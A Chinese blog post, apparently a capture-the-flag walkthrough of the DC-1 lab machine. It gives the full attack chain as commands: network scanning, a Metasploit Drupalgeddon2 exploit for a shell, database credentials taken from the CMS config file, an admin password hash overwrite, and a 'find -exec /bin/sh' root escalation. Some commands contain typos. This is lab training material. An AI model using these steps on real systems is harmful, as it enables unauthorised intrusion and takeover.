DC-1
一、实验环境
二、开始渗透
- 搜集信息
- flag1(CMS版本漏洞)
- flag2(CMS配置文件)
- flag3(数据库信息)
- flag4(靶机用户信息)
- flag5(find提权)
三、总结(心里话(maybe quantui?))
一、实验环境
虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DC-1(网卡初始为仅主机模式,要有安全意识)
1
2
3
二、开始渗透 - 搜集信息
输入sudo su,将kali切换到root权限;
输入ifconfig查询自身ip,即攻击机ip;
可以看到自身ip为192.168.56.101。
输入arp-scan -l扫描本网段存活主机,即靶机ip地址。
可以看到靶机ip为192.168.56.102,那192.168.56.100是什么呢?自己想一下。
输入nmap -p- 192.168.56.102扫描靶机所有端口开放情况。
可以看到端口22、80、111、45433是开放的。
尽量不爆破,实际渗透环境中有可能锁ip。
知道http服务是开的,打开浏览器输入192.168.56.102:80大致看一下界面。
命令行输入whatweb -v 192.168.56.102查询网站信息。
可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS)。
- flag1(CMS版本漏洞)
查查有没有版本漏洞,命令行输入msfconsole
打开Metasploit。
1
输入search Drupal,查询出了一些版本漏洞,优先使用针对time最近且rank最高的漏洞的exp,即对应exploit/unix/webapp/drupal_drupalgeddon2这个漏洞的exp。
输入use exploit/unix/webapp/drupal_drupalgeddon2,
在metasploit中输入 set RHOSTS 192.168.56.102(靶机ip),
以及set LHOSTS 192.168.56.101(kali系统ip)
开始润,得到shell。
先输入shell,再输入ls,得到flag1.txt,输入cat flag1.txt查看
- flag2(CMS配置文件)
由于这是一个CMS,可以找它的配置文件看一看。
发现靶机上有python,先输入python -c 'imoprt pty; pty.spawn("/bin/bash")'
转成交互式shell,方便操作。
1
2
找到Drupal的配置文件在/var/www/sites/defualt/settings.php,查看后获获得flag2.txt。
其中发现数据库信息。
- flag3(数据库信息)
由上图,得知database,username, password。
输入mysql -udbuser -pR0ck3t
登录数据库。
1
2
输入show databases;查看有哪些数据库,
通过输入use drupaldb;切换到drupaldb,然后输入show tables;查看表名,发现users。
select*后发现比较乱乱,不过有属性名name和pass,
故输入select name,pass from users;,发现user和password。
密码经过加密,秉持攻击机靶机能不连公网就不连的原则,在本地上网查到drupal的密码修改方法。
cd /var/www后,执行./script/password-hash.sh drneos得到drneos的加密形式。
保存后面的hash字符串,再次进入mysql的drupaldb数据库,修改admin的密码,输入
update user set pass = '$S$DbGB6f5y0ESQdtMn1R61MBNKgHkQTaY5VSmOn41SLbCCek1IPE8M' where uid = 1;
至此,可以登录网站了。
在网站中输入用户名admin,密码deneos,进入drupal。
在Dashboard板块中发现flag3,点击得到flag3内容。
- flag4(靶机用户信息)
命令行输入cat /etc/passwd查看用户信息,发现flag4。
本着能不爆破就不爆破的想法,找啊找,发现了flag4.txt
- flag5(find提权)
最后阶段了,往往都是要提权,这里用find命令。
输入find flag1.txt -exec "/bin/sh" \;拿到root权限。
进入/root目录,发现最终flag!。
至此,渗透结束。
三、总结(心里话(maybe quantui?))
经过上述的渗透过程,大家应该或多或少有一些想法,如果没有那些现成的工具(metasploit,whatweb,arp-scan等等),你怎么办?如果给你一个纯净的windows系统,什么软件也没有,然后再给你靶机让你去渗透,你能拿下它吗?你能短时间拿下吗?
说实话,我认为最精髓的不是如何熟练使用那些现有的工具,而是自己有那种根据渗透时不同阶段的需求去独立编写出扫描脚本和漏洞利用代码的能力。倘若你发现了漏洞,没有别人现成的脚本、exp,你怎么拿shell?怎么提权?自己开发?你有那个能力吗?越到后面与需要你的开发能力。
第一步是当好脚本小子,学习基本的渗透思路,工具看见一个积累一个,慢慢的,你会发现你越来越强。
最后,其实在实际环境中,社会工程学(钓鱼)和暴力破解(硬上)是最快最有效的,当我意识到这个现象的时候,说实话我的网安心有些动摇。
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/qq_38678845/article/details/135279582